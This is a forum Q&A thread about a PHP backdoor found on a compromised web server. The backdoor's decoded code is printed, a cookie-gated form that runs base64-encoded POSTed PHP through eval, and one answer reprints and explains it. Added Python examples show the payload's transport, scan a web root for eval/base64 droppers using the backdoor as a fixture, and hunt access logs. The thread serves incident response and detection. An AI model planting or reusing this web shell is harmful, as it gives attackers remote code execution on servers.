
I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like:

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}

But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704

I can sort of see where this code is going, but I'm definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated.

I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla

Thanks!


2 Answers


If the cookie "v" is set to "d", a textarea is displayed in a form. When the form is submitted, the code in the textarea is executed.

<?php
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){
    if (!empty($_POST['c'])) {
        echo '<textarea rows=28 cols=80>';
        $d=base64_decode(str_replace(' ','+',$_POST['c']));
        if($d)
            @eval($d);
        echo '</textarea>';
    }
    echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';
    exit;
}
?>
answered 2012-04-09T05:29:40.187
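Two things a responder usually wants to see for the chunk the answer describes, as an added example (not code from the question, the answer, or the pastie): why the shell does `str_replace(' ','+', ...)` on the posted blob, and a scanner that finds copies of such a chunk wrapped in `eval(base64_decode('...'))` across a web root. The web-root layout, file names and sample PHP payload are constructed for the demonstration; the only thing taken from the page is the decoded chunk itself.

```python
"""Added example (not from the original question or answers): how the
backdoor's base64 transport works, and a scanner for wrapped copies of it.
File names, paths and the sample payload are constructed for the demo."""
import base64
import os
import re
import tempfile
from urllib.parse import parse_qs

# The chunk decoded in the question, used here only as fixture content.
BACKDOOR_CHUNK = (
    "if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){"
    "if (!empty($_POST['c'])) {$d=base64_decode(str_replace(' ','+',$_POST['c']));"
    "if($d) @eval($d);}exit;}"
)
# Tokens that mark a decoded blob as a code-execution backdoor.
INDICATORS = ("eval(", "$_POST", "$_COOKIE", "base64_decode(", "system(", "passthru(")
# base64_decode('...') or base64_decode("...") with a literal argument.
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def restore_padding(s):
    """Re-add '=' padding that a dropper may have stripped."""
    return s + "=" * (-len(s) % 4)


def repair_posted(blob):
    """Mirror the shell's str_replace(' ', '+'): a '+' sent unescaped in a
    form body is URL-decoded to a space by the server, so put it back."""
    return restore_padding(blob.replace(" ", "+"))


def normalize_literal(blob):
    """A base64 literal in source may be wrapped over several lines."""
    return restore_padding(re.sub(r"\s+", "", blob))


def simulate_post(php_payload):
    """Attacker base64-encodes PHP and posts it as c=<blob> without
    percent-encoding. Returns (what $_POST['c'] holds, what eval() runs)."""
    blob = base64.b64encode(php_payload.encode()).decode()
    body = "c=" + blob                      # '+' left unescaped by the client
    as_received = parse_qs(body)["c"][0]    # server turned every '+' into ' '
    recovered = base64.b64decode(repair_posted(as_received)).decode()
    return as_received, recovered


def decode_layers(blob, max_depth=5):
    """Peel nested base64 until the result no longer looks like base64."""
    text = blob
    for _ in range(max_depth):
        try:
            text = base64.b64decode(normalize_literal(text)).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            break
        if not re.fullmatch(r"[A-Za-z0-9+/=\s]+", text):
            break
    return text


def scan_php_source(src):
    """Findings for each literal base64 argument whose decoded form carries indicators."""
    findings = []
    for m in B64_LITERAL.finditer(src):
        decoded = decode_layers(m.group(1))
        hits = [t for t in INDICATORS if t in decoded]
        if hits:
            findings.append({"offset": m.start(), "indicators": hits, "decoded": decoded})
    return findings


def scan_tree(root):
    """Map relative path -> findings for every PHP-like file under root."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_php_source(fh.read())
            if findings:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return results


def build_sample_webroot():
    """Constructed fixture: a clean index.php, plus a dropper in an images
    directory hiding the chunk with padding stripped and the blob line-wrapped."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    blob = base64.b64encode(BACKDOOR_CHUNK.encode()).decode().rstrip("=")
    blob = "\n".join(blob[i:i + 60] for i in range(0, len(blob), 60))
    with open(os.path.join(root, "images", "thumb.php"), "w") as fh:
        fh.write("<?php @eval(base64_decode('" + blob + "')); ?>\n")
    return root


if __name__ == "__main__":
    seen, ran = simulate_post('echo "<b>".php_uname()."</b>";')
    print("PHP saw in $_POST['c']:", seen)
    print("eval() executed       :", ran)
    for path, hits in scan_tree(build_sample_webroot()).items():
        print(path, [h["indicators"] for h in hits])
```

The scanner looks only for literal arguments to `base64_decode`; real droppers also build the function name from string fragments or route through `gzinflate`, `str_rot13` or `preg_replace` with the `e` modifier, so treat a clean scan as a weak negative and compare the tree against a known-good copy or package checksums as well.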

Not this particular exploit, but some of the advice in this post may help. Specifically, the access logs may show you the root of the problem.

answered 2012-04-09T05:51:01.503
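To make the pointer to access logs concrete, an added example that is not part of the answer above: parse Apache/nginx combined-format log lines, flag POST requests to PHP scripts sitting in directories that should only serve static files, and trace back from the first hit on a suspect script to the same client's earlier requests, which is where the upload or exploit that dropped the file usually shows up. The log lines, client addresses (RFC 5737 documentation ranges) and paths are constructed for the demonstration.

```python
"""Added example, not part of the original answer: hunt an access log for
activity around a web shell like the one in the question. Log lines, IPs
and paths below are constructed for the demo."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# combined format: ip ident user [time] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Directories that should hold static files only; a PHP script taking POSTs here is suspect.
NO_EXEC_DIRS = ("/images/", "/uploads/", "/media/", "/cache/", "/tmp/")

# Constructed sample log: one ordinary visitor, one client that logs in to a
# (hypothetical) admin area, uploads something, then starts POSTing to a PHP
# file under /images/.
SAMPLE_LOG = """\
198.51.100.23 - - [08/Apr/2012:02:58:10 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Apr/2012:03:11:02 +0000] "GET /admin/login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Apr/2012:03:11:40 +0000] "POST /admin/upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Apr/2012:03:12:45 +0000] "POST /images/stories/thumb.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.23 - - [08/Apr/2012:03:13:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4401 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Apr/2012:03:15:09 +0000] "POST /images/stories/thumb.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; silently skip lines that do not match."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["path"], _, e["query"] = e.pop("target").partition("?")
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def suspicious_posts(entries):
    """POSTs to .php files in directories that should never execute code, keyed by path."""
    hits = defaultdict(list)
    for e in entries:
        if (e["method"] == "POST" and e["path"].endswith(".php")
                and e["path"].startswith(NO_EXEC_DIRS)):
            hits[e["path"]].append(e)
    return dict(hits)


def trace_back(entries, shell_path, window=timedelta(minutes=30)):
    """Same-client requests in the window before the first hit on shell_path:
    the drop or entry point usually sits in here."""
    shell_hits = [e for e in entries if e["path"] == shell_path]
    if not shell_hits:
        return []
    first = min(shell_hits, key=lambda e: e["ts"])
    return [e for e in entries
            if e["ip"] == first["ip"] and first["ts"] - window <= e["ts"] < first["ts"]]


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for path, hits in suspicious_posts(entries).items():
        print(f"{path}: {len(hits)} POSTs from {sorted({h['ip'] for h in hits})}")
        for e in trace_back(entries, path):
            print("  earlier from same client:", e["ts"].isoformat(), e["method"], e["path"])
```

One caveat when hunting this particular shell: the default combined log format does not record request headers beyond Referer and User-Agent, so the `v=d` cookie that gates the backdoor never appears in the access log. Pivot on method, path and client address instead, and pair the log timeline with file modification times in the web root.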